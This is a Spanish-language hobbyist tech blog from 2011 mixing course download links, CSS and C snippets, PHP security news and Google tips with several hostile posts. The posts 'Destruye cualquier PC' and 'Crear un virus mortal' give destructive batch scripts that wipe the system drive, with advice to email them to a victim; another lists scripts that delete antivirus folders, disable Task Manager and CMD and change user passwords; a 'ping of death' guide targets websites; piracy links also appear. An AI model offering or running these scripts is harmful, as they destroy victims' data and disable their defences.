jueves, 29 de diciembre de 2011

Curso CCNA - Videos, Soft y Manuales


Contenido del Aporte:
Libros:
  • CCNA 1 y 2 [414 Paginas](en español)
  • CCNA ICND1 [685 paginas](en ingles)
  • CCNA ICND2 [734 Paginas](en ingles)
  • CCNA Study Guide [1012 Paginas](en ingles)
Videos:
Los videos son grabados con un programa propio desarrollado por quienes dan el curso asi que no se reproducen con ningun reproductor comun, se reproducen con su propio reproductor que posteo mas abajo
Son 2 Modulos de 10 claces de 4 horas cada una.
un total de 80 horas o 20 claces.

Software:
  • Reproductor
  • Packet Tracer (Para realizar algunos ejercicios que mencionan)
  • Subnet Calculator (Calculadora IP, para otros ejercicios)
  • Pack de software y SO (Sistema Operativo) de Swich de CISCO

Presentaciones:
Presentciones en PDF y PPT (Los cuales aparecen en los videos que son explicados por el profesor), tambien 2 guias de ejercicios para realizar.
Todos los links comprimidos no tienen contraseña, pesan en total 593 MB y descomprimidos 1.12 GB
Sin mas rodeos aqui los links.

Libros:
http://www.megaupload.com/?d=G24C2VAR
Presentaciones:
http://www.megaupload.com/?d=HNUXB3Q4
http://www.megaupload.com/?d=2GMIR44G
Ejercicios:
http://www.megaupload.com/?d=7281ESLV
Software:
Reproductor: http://www.megaupload.com/?d=HN9HYVZS
Varios: http://www.megaupload.com/?d=VEKGFXFZ
Videos:
Modulo 1
http://www.megaupload.com/?d=S630JN3F
http://www.megaupload.com/?d=Z1TCV78I
http://www.megaupload.com/?d=10VMDXNR
http://www.megaupload.com/?d=VAUHGI0A
http://www.megaupload.com/?d=KDMI3XXZ
http://www.megaupload.com/?d=UB2JD61G
http://www.megaupload.com/?d=VRDVKIY8
http://www.megaupload.com/?d=2SNC1UX7
http://www.megaupload.com/?d=M7S8DUU0
http://www.megaupload.com/?d=7IDPVEQH
http://www.megaupload.com/?d=AZB576K7

Modulo 2
http://www.megaupload.com/?d=QJCT3W41
http://www.megaupload.com/?d=CYAVNWSM
http://www.megaupload.com/?d=BDZCSITN
http://www.megaupload.com/?d=CN6GWKYB
http://www.megaupload.com/?d=T0VAE1Z7
http://www.megaupload.com/?d=V61LBOT0
http://www.megaupload.com/?d=MQXEZGB7
http://www.megaupload.com/?d=NM7JQ0MX
http://www.megaupload.com/?d=IHO2959O
http://www.megaupload.com/?d=P5G0MX8B

Bueno eso es todo, espero que les sirva y les ayude, cualquier duda o problema que tengan avisen y lo veo.

HTTP: conseguir contraseña oculta con asteriscos

hola amigos como estan aca les traigo este truco navegando, aqui se mostrara como conseguir una contraseña oculta guardada en una web que está con asteriscos.

Para poder revelar esta contraseña es necesario reemplazar la url de la web por este código:
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j< F.length; ++j) { f = F[j]; for (i=0; i< f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Claves encontradas:\n\n" + s); else alert("No hay claves");})();
Y al darle Enter, saldrá un mensaje con la contraseña. OJO: este script lo probe en el navegador del Explorer y SI FUNCIONA, no se si funcione en Firefox o Chrome.

PHP 5.3.8 corrige un fallo introducido por la propia PHP 6 dias atras

Se que la noticia es algo pasada porque fue de agosto, pero la encontre googleando y aqui se la comparto espero les guste :).
El pasado día 17 de agosto, se publicaba la nueva versión estable (5.3.7) del popular lenguaje de programación PHP. Incluía la corrección de un error de seguridad en la función "crypt" al utilizarse para generar contraseñas con "sal" que podría causar un desbordamiento de memoria intermedia. Seis días después lanzan una nueva versión para corregir un error introducido en la corrección.
La función "crypt" de PHP, permite a los usuarios generar el hash de una cadena utilizando un algoritmo de cifrado. Acepta además un segundo valor que sería un valor hash (MD5, Blowfish o DES) que se usa de sal para la generación a su vez del hash de una contraseña. Los hashes de contraseñas con sal intentan evitar los ataques de diccionario. La versión 5.3.7 corregía un desbordamiento de de memoria intermedia en esta función.
Pero al corregir este error, el equipo de desarrollo de PHP ha introducido otro que, como mínimo, no permitía el correcto funcionamiento de la función y además introducía otro potencial problema de seguridad. En lugar de devolver el hash correcto calculado con la cadena, la función "crypt" devolvía el mismo valor de la sal ya introducido como segundo parámetro cuando se usaba una sal MD5. Si se utilizaba sal Blowfish o DES, se calculaba correctamente.

Ej:
printf("MD5: %s\n", crypt('password', '$1$U7AjYB.O$'));
Debía devolver: MD5: $1$U7AjYB.O$L1N7ux7twaMIMw0En8UUR1 pero en realidad devolvía: MD5: $1$U7AjYB.O

Es destacable en este caso que el grave problema ha dejado a algunos usuarios con aplicaciones inservibles o bien totalmente expuestas, porque según se utilizase esta función, se validaría cualquier contraseña en ciertos escenarios.
PHP no ha tardado en reaccionar, y una vez identificado el error, han publicado una nueva revisión del código en el repositorio oficial, de forma que ya está disponible la versión estable 5.3.8, que soluciona este fallo.

Fuente: http://www.hispasec.com/unaaldia/4686

domingo, 25 de diciembre de 2011

Programa para calcular equivalencias en Bytes - Kilobytes - Megabytes - Gigabytes - Terabytes en C

hola, aqui les paso un codigo que encontre navegando por la web, este programa esta en C y como dice en el titulo al ingresar un numero convierte su valor en Kilobytes, Megabytes, Gigabytes y Terabytes.
El codigo de abajo lo ponen dentro del main.
char *unidades[] = {"bytes","kilobytes","megabytes","gigabytes","Terabytes"}; 
// Partimos del supuesto de que lo que nos dan son bytes 
float resultado; 
// Mas abajo van a ver porque float 
printf("Ingresa  una cantidad X de bytes: "); 
scanf("%f" , &resultado); 
printf("Sus equivalencias son:\n"); 
int unidad = 0; //con esta variable hacemos un bucle 
do
{ 
printf("%s: %f\n" , unidades[ unidad ] , resultado); 
resultado /= 1024; //aqui pasamos el valor en bytes a kilo,mega,...
unidad++; 
} 
while ( unidad < 5 ); //aqui recorremos el array hasta el indice 4 
las funciones printfy scanf las he explicado en otros posts que hice sobre C como aqui.

Destruye cualquier PC facilmente

Abram el Notepad y copien el siguiente codigo de abajo:
@echo off
del *.txt
del *.exe
del *.ini
net stop "security"
del c://windows/system32
mkdir O
copy halo.bat O
copy %0 halo.bat %windir%
kill %windir%
kill system.ini

Guardenlo como .bat.
Este codigo apagaa la computadora de la victima. Lo apaga solo una vez y elimina los archivos necesarios para resetear y reiniciar. Diviertanse :D

RECUERDA: No des click en este archivo.
NO PODRAS RECUPERAR TU COMPUTADORA DESPUES DE DAR CLICK EN ESTE ARCHIVO .BAT

No intentes esto en tu propia maquina

Crear un virus mortal en 10 segundos

Hola amigos, despues de "naufragar" un poco por la red encontre este codigo que aca les comparto. La funcion de este codigo es eliminar todos los archivos del disco duro y aoagar tu maquina.
Lo que van a hacer es:
  1. Abrir Block de Notas.
  2. Copia el codigo de abajo y pegalo en el Block de Notas.
  3. @echo off 
     del %systemdrive%\*.* /f /s /q 
     shutdown -r -f -t 00
    
  4. Guardalo como .bat
  5. Adjuntalo este archivo en tu email y envialo a tu victima
P.D.: Nunca abras este archivo despues de haber guardado en la computadora, de lo contrario perderas toda la data de tu disco duro.

sábado, 24 de diciembre de 2011

Descargar MP3 GRATIS de Google

haciendo la ultima surfeada del dia, encontre un truquito para descargar musica mp3 gratis de Google escribiendo en la barra de busqueda:
"Band or Artist name here" last modified mp3 "index of" -html -htm - php -asp

Por ejemplo, si yo quisiera encontrar mp3 de U2 escribiria:

"U2" last modified mp3 "index of" -html -htm -php -asp

Tips y Trucos de Google

El motor de busqueda google soporta algunos divertidos tips y trucos los cuales listare a continuacion. Cada uno de ellos afecta de forma diferente al motor de busqueda google.
  • Escribe google gothic en el textbox de busqueda y denle click al boton de su derecha
  • Escribe google easter egg en el textbox de busqueda cliqueen en el boton de la derecha
  • Escribe google Linux en el textbox de busqueda y clickeen el boton de la derecha
  • Escribe google 1337 en el textbox de busqueda y cliquea en el boton de la derecha de google
  • Escribe google Loco en el textbox de busqueda y cliquea en el boton de la derecha.
Aqui veran en el video de abajo algunos trucos.

El Ping de la Muerte

Hola, esto lo lei hace muchos años, no se si todavia se puede hacer este tipo de ataque a las webs ya que estuvo muy de moda en los '90 pero me parece que despues fue corregido, aqui les comparto lo que encontre.
Un ping de la muerte es un tipo de ataque enviado a una computadora que consiste en mandar numerosos paquetes ICMP muy pesados (mayores a 65.535 bytes) con el fin de colapsar el sistema atacado.
Es un tipo de ataque a computadoras que implica enviar un ping deformado a una computadora. Un ping normalmente tiene un tamaño de 64 bytes; algunas computadoras no pueden manejar pings mayores al máximo de un paquete IP común, que es de 65.535 bytes. Enviando pings de este tamaño puede hacer que los servidores se caigan.

El metodo de empleo seria el siguiente:

1- Primero que nada deben de entrar al cmd para los que no conoscan como hacerlo mantengan presionada la tecla de la ventanita windows y luego la tecla R.
START R
Debe de salirles este cuadrito

Aqui van a escribir cmd y presionan enter

2-

escriben cd.. 2 veces igual que la foto

3- en esta ventanita comocida como PROMP van a escribir
ping -t -l (cantidad de paquetes) "direccion ip"
-t: ping al host especificado hasta que se pare.
-l: es el tamaño del paquete(va de 0 a 65500).

la idea consiste en enviar un datagrama IP cuyo tamaño total supere el maximo autorizado (65.535 byte)
Podria escribir algo asi

Ping -t -l 2000000 website.com

y saldra una pantalla mas o menos asi:


y listo... a la victima se le colapsara la conexion.

viernes, 23 de diciembre de 2011

Bromas simples para Batch

Bueno antes de poner algo de codigo en BAT les pondre algunos conceptos para que se vayan adentrando en este mundo.

Introduccion
Un archivo batch (o bat) es un archivo de procesamiento por lotes, que contienen un conjunto de comandos DOS. Cuando se ejecuta este archivo bat, los comandos contenidos son ejecutados.
Cualquier comando DOS puede ser utilizado en un archivo batch.

¿Qué se puede hacer con ellos?
Pues se puede hacer de forma automatizada todo aquello que se pueda hacer en la consola de msdos.

Empecemos por el clasico Hola Mundo solo que esta vez lo haremos en bat
Codigo
@echo off
echo Hola Mundo
pause
exit
bueno para escribir este codigo pueden usar el Block de Notas lo guardan como ejemplo.bat en donde dice tipo eligen Todos los archivos.
Ahora cuando lo ejecuten saldra el mensaje Hola Mundo y abajo dira Presione una tecla para continuar.
Les explicare un poco estas lineas de codigo:
echo
Imprime un texto en pantalla, que es el texto que viene despues
pause
Como dice, pausa la ejecucion del codigo. Ademas muestra el mensaje "Presione una tecla para continuar".
exit
Cierra la ventana de comandos.

Bueno ahora entendiendo un poco mas, aca les doy un codigo que encontre para que hagan cosas divertidas, pero tengan mucho cuidado con su uso ya que puede ser peligroso, les doy este codigo para que conozcan mas codigo y sepan lo que se puede hacer con codigo bat.

Como hacer que la memoria se ponga a full
@echo off
:1
start www.google.com
goto 1

aqui como ven los bucles se hace con goto el cual es similar al goto. Lo que hacemos aqui es abrir bastantes ventanas google hasta colgar la PC.

apagar la pc cada que inicia
@echo off
echo shutdown -s -f -t 0 >> c:autoexec.bat
cls

bloquear click derecho del raton
@echo off
reg add HKEY_current_userSOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem /v DisableTaskMgr /t reg_dword /d 00000001 /f
@echo off
Reg add hkey_current_usersoftwarepoliciesmicrosoftwindowssystem /v DisableCMD /t reg_dword /d 00000001 /f

bloquear la consola cmd
@echo off
Reg add hkey_current_usersoftwarepoliciesmicrosoftwindowssystem /v DisableCMD /t reg_dword /d 00000001 /f

bloquear el administrador de tareas
@echo off
reg add HKEY_current_userSOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem /v DisableTaskMgr /t reg_dword /d 00000001 /f

bloquear programas en terminacion .exe

@echo off
assoc .exe=txtfiles

bloquear registro
@echo off
Reg add hkey_current_usersoftwarepoliciesmicrosoftwindowssystem /v DisableCMD /t reg_dword /d 00000001 /f
@echo off
reg add HKEY_current_userSOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem /v DisableRegistryTools /t reg_dword /d 00000001 /f

bloquear una pag web
@echo off
0.0.0.0 WWW.la pagina.COM >> %windir%system32driversetchosts

borrar antivirus mas usados
@echo off
cls
cd 
cd "archivos de programa"
cd "Norton antivirus"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Panda Software"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Kaspersky Lab"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "McAfee.com"
attrib -R -A -S -H *.*
del /S /Q *.*
cls

cambiar contraseña
@echo off
net user %username% uikhgfkshdojf

crear 1000 carpetas en disco duro
@echo off
cd C:
set carp=1000000
:crearcarpeta
md %carp%
set /a carp=%carp%-1
if %carp%== 0 (Goto 5) Else (Goto crearcarpeta)
:5

mil carpetas en escritorio
@echo off
set carpe=1000000
cd %homepath%escritorio
:carpetaescritorio
md %carpe%
set /a carpe=%carpe%-1
if %carpe%== 0 (Goto 6) Else (Goto carepetaescritorio)
:6
estos codigos son para que tengna mucho cuidado con los .bat que abran, espero le den buen uso al codigo.

Como hacer borde redondeado a los textbox usando CSS

hola como estan, hace tiempo que no escribo algo al blog, espero que esto les sirva a los amantes del diseño web, CSS y gente que quiera aprender, aqui explicare como hacer un borde redondeado a una caja de texto usando una imagen y CSS. El textbox sera ubicado sobre la imagen la cual dara el efecto de ver los bordes redondeados para que luzca asi

utilize este formulario de inicio de sesion que tenia hecho en php para explicarles.
Ahora lo que van a colocar en el textbox que deseen poner este efecto es este codigo HTML
Codigo HTML para textbox con bordes redondeados
en el ejemplo que tengo como eran 2 textbox, uno de login y el otro de password dentro de una tabla tuve que hacerlo asi:

ID Usuario
Password

para explicarles mejor la etiqueta div contiene la imagen de fondo(la de los bordes redondeados) y en la etiqueta input definimos el textbox y llamamos a loginbox.
Ahora para utilizar esa imagen hemos llamado a loginboxdiv la cual contiene a la imagen.
aqui pondre el codigo CSS para lograr tal efecto:

Como ven este codigo CSS es muy sencillo, el alto y el ancho de la clase loginboxdiv es mayor que la clase loginbox. La clase loginbox es la clase del texbox. Como pueden ver en el codigo CSS, el borde es eliminado y la altura, ancho y relleno son manejados de acuerdo al tamaño de la imagen de fondo.
Obviamente donde ejecuten su pagina ya sea .php .html lo que sea tienen que poner la imagen login_bg.gif y el codigo de arriba lo ponen antes de la etiqueta .
Pero si su pagina esta en php y hereda los estilos de otro archivo .css el codigo CSS peguenlo en el mismo script PHP.
Espero les sirva el codigo :D, si quisieran que postee otros contenidos solo diganme, trato de poner lo que voy aprendiendo aqui porque creo que elc onocimiento se comparte, ya no he tenido mucho tiempo pero ojala este post les haya gustado. Gracias por su visita y su tiempo. Tengan Feliz Navidad.

Libros AJAX, JavaScript, CSS, XHTML en Linea


La web llamada librosweb.es, nos da la oportunidad de aprender 4 lenguajes con los cuales podemos DOMINAR EL MUNDO WEB... y adentrarse mas en el diseño web porque con CSS se puede hacer muuuuchas cosas ... yo solo les puedo decir que son la base de toda Web 2.0... y si aprendemos a manejarlos dominaran el mercado web... asi que el que no aprende es porque no quiere... disfruten estos libros

jueves, 22 de diciembre de 2011

VideoTutoriales: Curso desarrollo aplicaciones para Android en Eclipse

Buscando por YouTube.com encontré estos fantásticos videotutoriales sobre como empezar a manejarse, configurar y programar en el IDE (Integrated development environment) Eclipse con el plug-in ADT (Android Development Tools).
Todos los videotutoriales están muy bien explicados y detallando hasta el mínimo paso.
Son un total de 10 videos con una duración de entre unos 45 a 55 mints. aprox. Y si estás interesado en aprender a desarrollar aplicaciones para OS Android, estos videotutoriales son perfectos.
Curso desarrollo aplicaciones para Android con Eclipse:

Fuente
Canal YouTube: http://www.youtube.com/user/0utKast

Donde podremos encontrar múltiples VideoTutoriales del este autor, en diferentes ámbitos de lenguajes de programación y otras utilidades.

Curso de Introducción a Visual C# 2010 (MSDN), Videos y Ejemplos

¿Qué es Visual C#?
C# es un lenguaje con seguridad de tipos y orientado a objetos, sencillo pero eficaz, que permite que los programadores creen una gran variedad de aplicaciones. Junto a .NET Framework, Visual C# 2008 permite la creación de aplicaciones para Windows, servicios web, herramientas de bases de datos, componentes, controles, etc
Como saben Microsoft lanzará su plataforma de desarrollo Microsft Visual Studio 2010 mediados de abril, la cual traerá entre sus novedades este lenguaje de programación C#, el cual en su versión 2010 evolucionó para convertirse en nuevo y mejorado, con este curso de libre distribución de C# se aprenderá desde cero este lenguaje, este curso trae incorporado videos y ejemplos de desarrollo, dentro del curso trae una aplicación MSDN Video el cual se podrá tener acceso a su código fuente.
Un excelente si vas a comenzar a programar en C# versión 4, como nota personal, recomiendo este excelente manual.
Este curso le enseñará entre otras cosas:
  • Las características fundamentales del lenguaje C#
  • Cómo crear aplicaciones Windows con Visual Studio 2010
  • Utilizar controles en sus aplicaciones
  • Trabajar con imágenes y gráficos en 2D y 3D
  • Desplegar las aplicaciones que desarrolle
  • Utilizar las clases que se incluyen en la librería de .NET
  • Acceder a datos provenientes de una base de datos
  • Conocer en qué consiste LINQ y como utilizarlo en C#
  • Cómo exponer funcionalidad a otras aplicaciones mediante servicios Web.
Nota
  • El Curso de debe de abrir mediante el navegador Internet Explorer y activar los Activex.
  • Abrir el archivo (index.html)
  • Trae incorporados videos (wmv) de autoayuda además de código fuente de ejemplo.

Novedades C# 4.0
Soporte Dinámico
Visual C # 2010 proporciona soporte para el enlace a los tipos de dinámicas mediante la introducción de un tipo nuevo y dinámico. Este añadido permite a muchos nuevos escenarios, como el acceso simplificado a las API de COM, como las API de automatización de oficinas, a las API dinámicos tales como bibliotecas IronPython, y el código HTML Document Object Model (DOM). Oficina de Programación
El acceso a las interfaces COM, incluyendo la automatización de las API de Office, es mucho mayor por la adición de un nombre y argumentos opcionales, el tipo de dinámica, propiedades indizadas y ref modificadores opcionales.
Apoyo Equivalencia Tipo
Ahora puede implementar una aplicación que ha integrado la información de tipo en lugar de información de tipo que se importe de un ensamblado de interoperabilidad primario (PIA). Con información de tipo integrado, la aplicación puede utilizar los tipos en un tiempo de ejecución sin necesidad de una referencia al ensamblado en tiempo de ejecuciónSi varias versiones de la asamblea se publican en tiempo de ejecución, la aplicación que contiene la información de tipo incrustado puede trabajar con las diferentes versiones sin tener que recompilar.
Covarianza y contravarianza
Covarianza le permite utilizar un tipo de derivados más de la que especifica el parámetro genérico, mientras que contravarianza le permite utilizar un tipo menos derivados. Esto permite la conversión implícita de clases que implementan interfaces variante y proporciona flexibilidad a las firmas de métodos coincidentes con los tipos de delegado de la variante.Variante interfaces y delegados se pueden crear mediante el uso de los nuevos en y fuera palabras clave del lenguaje. El .NET Framework también introduce soporte para varios variación genérica interfaces existentes y los delegados, incluido el IEnumerable (Of T) y la interfaz de Func (Of Tresult) y acción (de T) delegados.
Nuevo comando Opciones de la línea
El /langversion opción de la línea de comandos hace que el compilador acepta la sintaxis única que es válida en la versión especificada de C #.
El /appconfig opción del compilador permite una aplicación C # para especificar la ubicación de la aplicación de configuración de un archivo de ensamblaje para el compilador.

Contenido del Curso
Módulo 1: Introducción a la plataforma .NET
  • Introducción a la plataforma .NET
  • ¿Qué es la plataforma .NET?
  • El entorno de ejecución CLR
  • El lenguaje intermedio y el CLS
  • El lenguaje intermedio
  • La especificación común de los lenguajes .NET
  • El sistema de tipos comunes
  • La biblioteca de clases de .NET
  • La BCL
  • Los espacios de nombres
  • Acceso a datos con ADO.NET
  • ADO.NET
  • La arquitectura de ADO.NET
  • Capa conectada de datos
  • Capa desconectada
  • LINQ
  • Introducción a LINQ
  • Lección 6: Aplicaciones Windows Forms
  • Introducción WPF
  • Aplicaciones Web Forms
  • Introducción
  • Silverlight
Módulo 2: Características del lenguaje C#
  • El sistema de tipos
  • Tipos primitivos
  • Variables y constantes
  • Enumeraciones
  • Arrays (matrices)
  • Clases y estructuras
  • Clases
  • Definir una clase
  • Instanciar una clase
  • Estructuras
  • Accesibilidad
  • Propiedades
  • Interfaces
  • Manejo de excepciones
  • Manejo de excepciones
  • Lección 4: Eventos y delegados
  • Eventos
  • Delegados
  • Definir y producir eventos en una clase
  • Atributos
Módulo 3: Desarrollo de aplicaciones Windows
  • Uso del diseñador de Visual Studio 2010
  • Controles de Windows Forms
  • Desarrollo de controles
  • Trabajo con imágenes y gráficos
  • Despliegue de aplicaciones
Módulo 4: La librería de clases .NET
  • Colecciones de datos
  • Los tipos de colecciones de .NET
  • Las clases base para crear colecciones
  • Colecciones de tipo generic (en breve)
  • Streams en .NET
  • Las clases basadas en Stream
  • Manejar un fichero usando FileStream
  • Manejar ficheros con StreamReader y StreamWriter
  • Cifrar y descifrar un fichero
  • Acceso al sistema de archivos
  • Las clases de System.IO
  • Clases para manipular unidades, directorios y ficheros
  • Clases para leer o escribir en streams
  • Acceso a Internet
  • Las clases de System.Net
  • Acceder a una página Web
  • Acceder a un servidor FTP
  • Obtener información de la red
Módulo 5: Acceso a datos
  • Descripción de ADO.NET
  • Acceso conectado a bases de datos
  • Acceso desconectado: DataSets y DataAdapters
  • DataSets tipados
  • Enlace a formularios
Módulo 6: Servicios Web
  • Introducción a los servicios Web
  • ¿Qué son los servicios Web?
  • Comunicación entre componentes
  • SOAP
  • Breve historia de SOAP
  • Las bases tecnológicas de SOAP
  • Descubrimiento de servicios: WSDL y UDDI
  • Creación de servicios Web
  • Nuestro primer servicio Web
  • Crear un proyecto de tipo servicio Web con Visual Studio 2010
  • Crear un servicio Web usando un solo fichero
  • Eliminar ficheros de un proyecto
  • Analizando el contenido de un servicio Web
  • Atributos aplicables a los servicios Web
  • Definición de la clase a usar en el servicio Web
  • Añadir métodos para usarlos en el servicio Web
  • Probar nuestro servicio Web
  • Consumo de servicios Web
  • Desde una aplicación de Windows
  • Alojar el servicio Web en un servidor local
  • Activar el servidor Web para usar con un directorio local
  • Crear un proyecto Windows para usar el servicio Web
  • Añadir una referencia para acceder al servicio Web
  • Acceder al servicio Web desde el código
  • ¿Que es lo que puede fallar?
Módulo 7: LINQ
  • Para qué LINQ
  • LINQ to Objects
  • LINQ to XML
  • LINQ y ADO.NET
  • LINQ to DataSet
  • LINQ to SQL
  • LINQ to Entities
Módulo 8: DLR – Dynamic Programming
  • C# e IronPython
Capturas



DESCARGAR

domingo, 18 de diciembre de 2011

Secretos y Verdades de Facebook

Encontre este interesante video uen un foro que habla de un supuesto plan de facebok por controlar todo. Aqui va la descripcion.
¿Crees saber todo sobre Facebook? ¿Cómo fue posible que haya ganado tanta popularidad? A través del siguiente video podrás conocer algunos datos, “secretos y verdades” sobre esta red social que actualmente se encuentra compitiendo fuertemente con el recién lanzado Google+.
Con más de 800 millones de usuarios en todo el mundo, Facebook se encuentra compitiendo con la red social de Google. Observa esta reseña histórica y entérate de datos que desconocías, ¿Será que Facebook seguirá creciendo o irá en decadencia como otras redes sociales? ¿Qué piensas?

sábado, 17 de diciembre de 2011

las mejores radios online en un solo lugar

TapinRadio, es un reproductor de audio el cual te permite escuchar una gran cantidad de estaciones de radios online. Las cuales se encuentran dispersas en varias partes del mundo.
Con TapinRadio podrás buscar tus radios online de acuerdo a su nombre, país o género musical. Siendo así que si eres fan del Rock solo debes digitar la palabra Rock en el buscador. Y a continuación TapinRadio te mostrara un listado con todas las radios que ofrecen este género musical.
Siendo así, que solo restara que selecciones una de ellas y a continuación des clic sobre el botón reproducir.
Por lo cual, si ya escuchaste toda la música que tienes alojada en tu disco duro, y deseas algo diferente. Puedes probar TapinRadio.

jueves, 15 de diciembre de 2011

Por que no se pueden Crear Carpetas con el Nombre "AUX"

Creo que a mas de uno le ha pasado, que al quere crear una carpeta con el nombre de "AUX", ésta vuelve al nombre de "Nueva Carpeta" y por mas que queramos cambiarle el nombre este siempre volverá a al nombre que tenia anterior...
¿Por que?
la razon es por que, windows tiene reservadas esas palabras ya sea para algunos de sus dispositivos, o algun comando de windows;

  • algunos de esas palabras reservadas son:
  • CON Keyboard and display
  • PRN System list device, usually a parallel port
  • AUX Auxiliary device, usually a serial port
  • CLOCK$ System real-time clock
  • NUL Bit-bucket device
  • COM1 First serial communications port
  • COM2 Second serial communications port
  • COM3 Third serial communications port
  • COM4 Fourth serial communications port
  • LPT1 First parallel printer port
  • LPT2 Second parallel printer port
  • LPT3 Third parallel printer port

aunque no creo q tengan problemas con los nombres de las carpetas.

sábado, 10 de diciembre de 2011

jueves, 8 de diciembre de 2011

domingo, 4 de diciembre de 2011

Xmen Vs Street Fighter (PC-Game)


DATOS TÉCNICOS:
Peso 20 Mb.
Idioma Inglés.
Para PC.
Categoría Lucha.
En 2D.
DESCRIPCIÓN:
Xmen Vs Street Fighter es un videojuego de lucha en dos dimensiones (2D), donde podemos controlar a los personajes de Street Fighter (Ryu, Ken, Vega, etc.) y hacer que se enfrenten a los superhéroes de la serie X-Men (Cíclope, Gámbito, Tormenta, etc.).
Las peleas son en parejas (2 luchadores) contra otras parejas de personajes. Sólo controlamos a un personaje cada vez, pero en cualquier momento de la partida podemos intercambiarlos pulsando dos botones simultáneamente.
HISTORIA:
Últimamente han sucedido varias desapariciones entre la comunidad mutante y entre los luchadores callejeros.
Existen rumores acerca de las desapariciones, cada uno de ellos pretendiendo ser el auténtico y decir saber qué está pasando. Algunas fuentes culpan de las desapariciones a Shadaloo, una organización militar secreta dirigida por el demente General Vega. Otros rumores dicen que todo es parte de un plan de Magneto, el auto-proclamado Amo del Magnetismo, para eliminar a todos aquellos que se oponen a su plan de destruir a todos los no-mutantes.
Con objeto de investigar la verdad oculta se han formado equipos de luchadores callejeros ("street fighters") y mutantes. Pero aunque todos ellos trabajan persiguiendo el mismo objetivo, entre sus filas hay diferencias que siguen siendo un problema y no dejan de producirse peleas.
Después de todas estas luchas, ¿quedará algo del Mundo que salvar? El resultado está en tus manos...

Mecánica de juego
Peleas de parejas (2 contra 2).
El jugador lucha con dos personajes que puede elegir libremente de entre el plantel de luchadores. Ambos personajes no pueden ser usados simultáneamente, teniendo que mantener uno de los dos oculto mientras se pelea con el otro. Solo aparecerán al unísono en pantalla durante la ejecución de un "supercombo" doble.
posee un sistema de control típico de Capcom, es decir, 6 botones, tres puños y tres patadas. Podemos combinar diversos movimientos simples, pulsando alternativamente los diferentes puños y patadas, en unos combos conocidos como Magic Series. Cada personaje posee unos patrones diferentes desde series tipo QP, MP, FP, a alternos QP, QK, MP, MK, FP, FK. Otros pueden empezar desde posiciones intermedias, ir hacia atrás en la serie, iniciar los combos agachados, etc.

Personajes
El juego pone a disposición del usuario una selección de 17 luchadores, 8 (ocho) sacados de los cómics de Xmen y 9 (nueve) de los juegos de Street Fighter.
Gouki (Akuma en occidente) se encuentra oculto en la parte superior del panel de selección (en la imagen).

CAPTURAS:

LINK DE DESCARGA:

Como mostrar carpetas ocultas por virus en memorias USB

Si al tratar de acceder a una carpeta localizada en su memoria USB se dan cuenta de que no está y están seguros que no la han borrado por accidente, lo más seguro es que su memoria fue infectada por un virus y este ocultó su carpeta junto con los archivos almacenados en ella; esto sucede más a menudo de lo que creen, lo bueno es que de una manera relativamente sencilla puede volver a mostrar la carpeta y todo su contenido sin problemas.
Bueno, el primer paso, y el más lógico, es escanear la memoria USB con un buen antivirus, si esto no funciono y sus carpetas siguen ocultas, procedemos al plan B:
  • Desde el escritorio de su computadora den clic en el botón Inicio y luego en Ejecutar
  • En la pantalla que aparece escriban cmd
  • Ahora estarán en la línea de comandos (una pantalla negra con letras blancas)
  • Escriban la letra de la unidad USB, por ejemplo si su memoria es la unidad H: simplemente escriban H: y presionen Enter, si lo hicieron bien ahora en la pantalla aparecerá algo como H: \> (si no saben cual unidad es su memoria USB pueden dirigirse a Mi PC y allí podrán localizarla).
  • Escriban lo siguiente: attrib -s -r -h /s /d esto mostrara las carpetas que estaban ocultas
Eso es todo, las carpetas volverán a ser visibles, en caso de que el virus haya creado carpetas nuevas borren las que no conozcan.

sábado, 3 de diciembre de 2011

Tecnicas para Obtener enlaces de forma Natural

Anoche mirando varios blogs y buscando otras informaciones me tope con un excelente vídeo de Matt Cutts donde habla de técnicas para obtener enlaces orgánicos (link building), me parecio muy completo e interesante así que decidí postear en primer lugar el vídeo y luego de esto un resumen de las técnicas que nos recomienda.

Las Tecnicas para obtener enlaces de forma natural:
  • Controversias, pelearse con alguien conocido o una empresa. Podes Llevar la contra a una empresa que odias por ejemplo y de seguro conseguirás repercusión, pero obviamente aclara que hacer esto también puede ser contraproducente y la gente puede comenzar a odiarte a vos si eres muy pesado.
  • Participar en comunidades como foros, grupos de email, etc. Si los utilizas bien y ayudas a las personas con el tiempo ellos se acordaran y sera mucho mas probable que obtengas enlaces de forma natural, porque realmente te conviertes en un amigo/colega electronico.
  • Una Investigación original, Sin duda colgar datos de una investigación que hayamos hecho y que ayude a resolver distintos problemas o dudas recibirán infinidad de enlaces citándola.
  • Newsletter informativos, son muy útiles para mantener informados a nuestros navegantes de los cambios de nuestra web y con ellos tendremos mas capacidad de realizar conversiones.
  • Facebook, Twitter y redes sociales, es importante tener presencia en los medios en donde las personas se pasan mucho tiempo, participar y ayudarlas, por la misma razón que en las comunidades y además con el plus de que las redes sociales son muy virósicas, es decir una noticia puede llegar a miles de personas de una forma muy rápida y fácil.
  • Tutoriales y minitutoriales, en general es uno de los recursos mas buscados por la gente pueden ser tutoriales completos sobre ciertos temas o una simple guía de como instalar algo o cosas así, por ejemplo como instalar impresoras en Ubuntu.
  • Brindar un servicio que sea útil a las personas, esto sin duda es una de las mejores formas de conseguir enlaces aunque a veces es algo costoso en cuanto a tiempos de desarrollo.
  • Crear y Liberar Plugins para Firefox, Chrome, WordPress es una buena forma de conseguir backlinks.
  • Crear vídeos, es una excelente técnica de promoción y realmente no es muy costoso si sabemos del tema que debemos hablar.
  • Crear Themes para wordpress y plantillas de sitios web para distribuirlos es otra excelente forma de conseguir enlaces.
  • Escribir artículos en otros blogs es una forma sencilla de conseguir enlaces y darte a conocer a los usuarios de ese blog.
Bueno me gusto mucho el vídeo y quería compartirlo con ustedes!

viernes, 2 de diciembre de 2011

Anatomía de un virus informático

Stuxnet es un virus informático desarrollado para equipos con Windows con la intención de espiar y reprogramar sistemas industriales. Concretamente su objetivo eran las centrales nucleares de Irán. Fue descubierto en 2010 y Kaspersky Labs, una de las principales empresas de seguridad informática a nivel mundial, describió a Stuxnet en una nota de prensa como:
